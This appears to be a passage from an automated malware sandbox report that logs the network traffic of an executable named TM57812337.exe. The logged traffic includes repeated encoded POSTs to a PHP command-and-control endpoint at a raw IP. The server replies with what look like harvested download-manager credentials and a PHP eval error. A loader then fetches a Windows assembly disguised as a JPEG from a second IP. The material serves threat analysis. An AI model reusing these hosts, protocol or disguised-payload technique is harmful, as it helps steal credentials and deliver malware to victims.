                              Data Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d 53 76 30 31 58 41 52 48 4a 4a 5a 4f 4a 71 61 66 73 44 2f 42 6b 6d 4c 79 79 4f 78 55 36 56 57 42 41 36 6d 6e 33 45 34 38 32 32 67 70 74 5a 42 53 65 4f 79 6a 6a 30 4a 71 77 30 6b 5a 7a 5a 79 49 50 36 79 65 43 47 76 25 32 42 78 4a 78 38 4f 7a 43 79 75 56 50 4c 63 49 41 39 34 4c 68 79 78 64 73 39 25 32 42 6e 35 62 53 33 51 4f 63 77 4b 55 76 70 74 57 4a 48 66 56 6a 5a 75 76 57 46 4b 25 32 42 4f 44 6d 39 79 4a 76 58 61 68 79 33 6a 50 6b 4f 42 6b 78 31 34 6a 32 35 42 49 6e 32 68 65 30 65 63 6e 74 50 71 50 6b 6d 59 30 4b 31 65 45 41 78 34 31 4b 41 41 4e 38 76 44 38 65 4a 72 56 30 58 66 73 6d 79 53 70 6d 46 6e 4a 52 75 58 33 36 67 6c 42 41 4f 59 6f 77 6f 4c 77 79 79 44 65 66 51 63 58 32 67 51 6b 32 2f 70 7a 7a 2f 32 4c 72 4f 61 37 65 50 48 34 6f 2f 71 64 4e 7a 76 58 71 7a 72 64 79 42 7a 57 6b 34 31 47 53 44 77 7a 33 71 70 79 38 6a 39 52 6b 64 57 4f 4b 43 61 4f 75 75 2f 32 65 31 73 35 41 34 37 79 77 53 31 2f 6a 6b 42 66 56 52 51 52 4b 77 3d 3d
                              Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiMSv01XARHJJZOJqafsD/BkmLyyOxU6VWBA6mn3E4822gptZBSeOyjj0Jqw0kZzZyIP6yeCGv%2BxJx8OzCyuVPLcIA94Lhyxds9%2Bn5bS3QOcwKUvptWJHfVjZuvWFK%2BODm9yJvXahy3jPkOBkx14j25BIn2he0ecntPqPkmY0K1eEAx41KAAN8vD8eJrV0XfsmySpmFnJRuX36glBAOYowoLwyyDefQcX2gQk2/pzz/2LrOa7ePH4o/qdNzvXqzrdyBzWk41GSDwz3qpy8j9RkdWOKCaOuu/2e1s5A47ywS1/jkBfVRQRKw==
                              May 27, 2022 13:24:40.575226068 CEST2817OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Data Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d 53 76 30 31 58 41 52 48 4a 4a 5a 4f 4a 71 61 66 73 44 2f 42 6b 6d 4c 79 79 4f 78 55 36 56 57 42 41 36 6d 6e 33 45 34 38 32 32 67 70 74 5a 42 53 65 4f 79 6a 6a 30 4a 71 77 30 6b 5a 7a 5a 79 49 50 36 79 65 43 47 76 25 32 42 78 4a 78 38 4f 7a 43 79 75 56 50 4c 63 49 41 39 34 4c 68 79 78 64 73 39 25 32 42 6e 35 62 53 33 51 4f 63 77 4b 55 76 70 74 57 4a 48 66 56 6a 5a 75 76 57 46 4b 25 32 42 4f 44 6d 39 79 4a 76 58 61 68 79 33 6a 50 6b 4f 42 6b 78 31 34 6a 32 35 42 49 6e 32 68 65 30 65 63 6e 74 50 71 50 6b 6d 59 30 4b 31 65 45 41 78 34 31 4b 41 41 4e 38 76 44 38 65 4a 72 56 30 58 66 73 6d 79 53 70 6d 46 6e 4a 52 75 58 33 36 67 6c 42 41 4f 59 6f 77 6f 4c 77 79 79 44 65 66 51 63 58 32 67 51 6b 32 2f 70 7a 7a 2f 32 4c 72 4f 61 37 65 50 48 34 6f 2f 71 64 4e 7a 76 58 71 7a 72 64 79 42 7a 57 6b 34 31 47 53 44 77 7a 33 71 70 79 38 6a 39 52 6b 64 57 4f 4b 43 61 4f 75 75 2f 32 65 31 73 35 41 34 37 79 77 53 31 2f 6a 6b 42 66 56 52 51 52 4b 77 3d 3d
                              Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiMSv01XARHJJZOJqafsD/BkmLyyOxU6VWBA6mn3E4822gptZBSeOyjj0Jqw0kZzZyIP6yeCGv%2BxJx8OzCyuVPLcIA94Lhyxds9%2Bn5bS3QOcwKUvptWJHfVjZuvWFK%2BODm9yJvXahy3jPkOBkx14j25BIn2he0ecntPqPkmY0K1eEAx41KAAN8vD8eJrV0XfsmySpmFnJRuX36glBAOYowoLwyyDefQcX2gQk2/pzz/2LrOa7ePH4o/qdNzvXqzrdyBzWk41GSDwz3qpy8j9RkdWOKCaOuu/2e1s5A47ywS1/jkBfVRQRKw==
                              May 27, 2022 13:24:41.784784079 CEST2817OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Data Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d
                              Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiM
                              May 27, 2022 13:24:43.075817108 CEST2819OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Data Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d
                              Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiM
                              May 27, 2022 13:24:44.387973070 CEST2820OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Data Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d 53 76 30 31 58 41 52 48 4a 4a 5a 4f 4a 71 61 66 73 44 2f 42 6b 6d 4c 79 79 4f 78 55 36 56 57 42 41 36 6d 6e 33 45 34 38 32 32 67 70 74 5a 42 53 65 4f 79 6a 6a 30 4a 71 77 30 6b 5a 7a 5a 79 49 50 36 79 65 43 47 76 25 32 42 78 4a 78 38 4f 7a 43 79 75 56 50 4c 63 49 41 39 34 4c 68 79 78 64 73 39 25 32 42 6e 35 62 53 33 51 4f 63 77 4b 55 76 70 74 57 4a 48 66 56 6a 5a 75 76 57 46 4b 25 32 42 4f 44 6d 39 79 4a 76 58 61 68 79 33 6a 50 6b 4f 42 6b 78 31 34 6a 32 35 42 49 6e 32 68 65 30 65 63 6e 74 50 71 50 6b 6d 59 30 4b 31 65 45 41 78 34 31 4b 41 41 4e 38 76 44 38 65 4a 72 56 30 58 66 73 6d 79 53 70 6d 46 6e 4a 52 75 58 33 36 67 6c 42 41 4f 59 6f 77 6f 4c 77 79 79 44 65 66 51 63 58 32 67 51 6b 32 2f 70 7a 7a 2f 32 4c 72 4f 61 37 65 50 48 34 6f 2f 71 64 4e 7a 76 58 71 7a 72 64 79 42 7a 57 6b 34 31 47 53 44 77 7a 33 71 70 79 38 6a 39 52 6b 64 57 4f 4b 43 61 4f 75 75 2f 32 65 31 73 35 41 34 37 79 77 53 31 2f 6a 6b 42 66 56 52 51 52 4b 77 3d 3d
                              Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiMSv01XARHJJZOJqafsD/BkmLyyOxU6VWBA6mn3E4822gptZBSeOyjj0Jqw0kZzZyIP6yeCGv%2BxJx8OzCyuVPLcIA94Lhyxds9%2Bn5bS3QOcwKUvptWJHfVjZuvWFK%2BODm9yJvXahy3jPkOBkx14j25BIn2he0ecntPqPkmY0K1eEAx41KAAN8vD8eJrV0XfsmySpmFnJRuX36glBAOYowoLwyyDefQcX2gQk2/pzz/2LrOa7ePH4o/qdNzvXqzrdyBzWk41GSDwz3qpy8j9RkdWOKCaOuu/2e1s5A47ywS1/jkBfVRQRKw==
                              May 27, 2022 13:24:46.794493914 CEST2821OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Data Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d 53 76 30 31 58 41 52 48 4a 4a 5a 4f 4a 71 61 66 73 44 2f 42 6b 6d 4c 79 79 4f 78 55 36 56 57 42 41 36 6d 6e 33 45 34 38 32 32 67 70 74 5a 42 53 65 4f 79 6a 6a 30 4a 71 77 30 6b 5a 7a 5a 79 49 50 36 79 65 43 47 76 25 32 42 78 4a 78 38 4f 7a 43 79 75 56 50 4c 63 49 41 39 34 4c 68 79 78 64 73 39 25 32 42 6e 35 62 53 33 51 4f 63 77 4b 55 76 70 74 57 4a 48 66 56 6a 5a 75 76 57 46 4b 25 32 42 4f 44 6d 39 79 4a 76 58 61 68 79 33 6a 50 6b 4f 42 6b 78 31 34 6a 32 35 42 49 6e 32 68 65 30 65 63 6e 74 50 71 50 6b 6d 59 30 4b 31 65 45 41 78 34 31 4b 41 41 4e 38 76 44 38 65 4a 72 56 30 58 66 73 6d 79 53 70 6d 46 6e 4a 52 75 58 33 36 67 6c 42 41 4f 59 6f 77 6f 4c 77 79 79 44 65 66 51 63 58 32 67 51 6b 32 2f 70 7a 7a 2f 32 4c 72 4f 61 37 65 50 48 34 6f 2f 71 64 4e 7a 76 58 71 7a 72 64 79 42 7a 57 6b 34 31 47 53 44 77 7a 33 71 70 79 38 6a 39 52 6b 64 57 4f 4b 43 61 4f 75 75 2f 32 65 31 73 35 41 34 37 79 77 53 31 2f 6a 6b 42 66 56 52 51 52 4b 77 3d 3d
                              Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiMSv01XARHJJZOJqafsD/BkmLyyOxU6VWBA6mn3E4822gptZBSeOyjj0Jqw0kZzZyIP6yeCGv%2BxJx8OzCyuVPLcIA94Lhyxds9%2Bn5bS3QOcwKUvptWJHfVjZuvWFK%2BODm9yJvXahy3jPkOBkx14j25BIn2he0ecntPqPkmY0K1eEAx41KAAN8vD8eJrV0XfsmySpmFnJRuX36glBAOYowoLwyyDefQcX2gQk2/pzz/2LrOa7ePH4o/qdNzvXqzrdyBzWk41GSDwz3qpy8j9RkdWOKCaOuu/2e1s5A47ywS1/jkBfVRQRKw==
                              May 27, 2022 13:24:46.823904991 CEST2821INHTTP/1.1 100 Continue
                              May 27, 2022 13:24:46.858236074 CEST2822INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 11:24:46 GMT
                              Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.2
                              X-Powered-By: PHP/8.1.2
                              Content-Length: 538
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 5b 5b 22 49 6e 74 65 72 6e 65 74 20 44 6f 77 6e 6c 6f 61 64 20 4d 61 6e 61 67 65 72 22 2c 22 68 74 74 70 73 3a 2f 2f 67 71 62 6d 77 73 77 42 61 79 2e 6f 72 67 22 2c 22 54 57 44 33 51 22 2c 22 4b 73 78 30 6c 5a 64 46 6b 79 57 74 41 62 76 22 5d 2c 5b 22 4a 44 6f 77 6e 6c 6f 61 64 65 72 22 2c 22 0a 70 4f 69 46 48 78 6a 6f 68 70 6a 64 65 73 45 2e 22 2c 22 25 30 41 54 43 56 65 42 46 48 68 79 6f 54 37 38 42 58 22 2c 22 25 30 41 68 68 31 39 7a 38 76 67 71 36 44 36 22 5d 5d 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 54 79 70 65 45 72 72 6f 72 3a 20 73 69 7a 65 6f 66 28 29 3a 20 41 72 67 75 6d 65 6e 74 20 23 31 20 28 24 76 61 6c 75 65 29 20 6d 75 73 74 20 62 65 20 6f 66 20 74 79 70 65 20 43 6f 75 6e 74 61 62 6c 65 7c 61 72 72 61 79 2c 20 6e 75 6c 6c 20 67 69 76 65 6e 20 69 6e 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 6a 61 68 5c 69 6e 63 5c 39 66 33 64 33 37 66 61 61 64 64 30 61 35 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3a 31 32 37 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 6a 61 68 5c 69 6e 63 5c 39 66 33 64 33 37 66 61 61 64 64 30 61 35 2e 70 68 70 28 31 32 29 3a 20 65 76 61 6c 28 29 0a 23 31 20 7b 6d 61 69 6e 7d 0a 20 20 74 68 72 6f 77 6e 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 6a 61 68 5c 69 6e 63 5c 39 66 33 64 33 37 66 61 61 64 64 30 61 35 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 31 32 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                              Data Ascii: [["Internet Download Manager","https://gqbmwswBay.org","TWD3Q","Ksx0lZdFkyWtAbv"],["JDownloader","pOiFHxjohpjdesE.","%0ATCVeBFHhyoT78BX","%0Ahh19z8vgq6D6"]]<br /><b>Fatal error</b>: Uncaught TypeError: sizeof(): Argument #1 ($value) must be of type Countable|array, null given in C:\xampp\htdocs\jah\inc\9f3d37faadd0a5.php(12) : eval()'d code:127Stack trace:#0 C:\xampp\htdocs\jah\inc\9f3d37faadd0a5.php(12): eval()#1 {main} thrown in <b>C:\xampp\htdocs\jah\inc\9f3d37faadd0a5.php(12) : eval()'d code</b> on line <b>127</b><br />


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              5192.168.2.3497663.124.188.3680C:\Users\user\Desktop\TM57812337.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 13:25:07.308217049 CEST2860OUTGET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1
                              Host: 3.124.188.36
                              Connection: Keep-Alive
                              May 27, 2022 13:25:07.328202963 CEST2861INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 11:25:07 GMT
                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                              Last-Modified: Wed, 25 May 2022 23:04:39 GMT
                              ETag: "68a00-5dfde1908ab1e"
                              Accept-Ranges: bytes
                              Content-Length: 428544
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/jpeg
                              Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 06 00 00 00 0c 00 06 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 00 32 00 37 00 33 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0e 00 44 00 00 00 39 00 32 00 37 00 33 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0e 00 40 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 72 00 73 00 70 00 7a 00 71 00 73 00 78 00 64 00 72 00 61 00 7a 00 63 00 62 00 67 00 77 00 4d 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 15 00 52 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 72 00 73 00 70 00 7a 00 71 00 73 00 78 00 64 00 72 00 61 00 7a
                              Data Ascii: 19273.1818.0.1noisreV ylbmessAD9273.1818.0.1noisreVtcudorP@emaNtcudorP"lld.rspzqsxdrazcbgwMemaneliFlanigirORskramedarTlageL*thgirypoClageL&lld.rspzqsxdraz


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              6192.168.2.3497673.124.188.3680C:\Users\user\Desktop\TM57812337.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 13:25:16.748927116 CEST3306OUTGET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1
                              Host: 3.124.188.36
                              Connection: Keep-Alive
                              May 27, 2022 13:25:16.769011974 CEST3307INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 11:25:16 GMT
                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                              Last-Modified: Wed, 25 May 2022 23:04:39 GMT
                              ETag: "68a00-5dfde1908ab1e"
                              Accept-Ranges: bytes
                              Content-Length: 428544
                              Keep-Alive: timeout=5, max=100
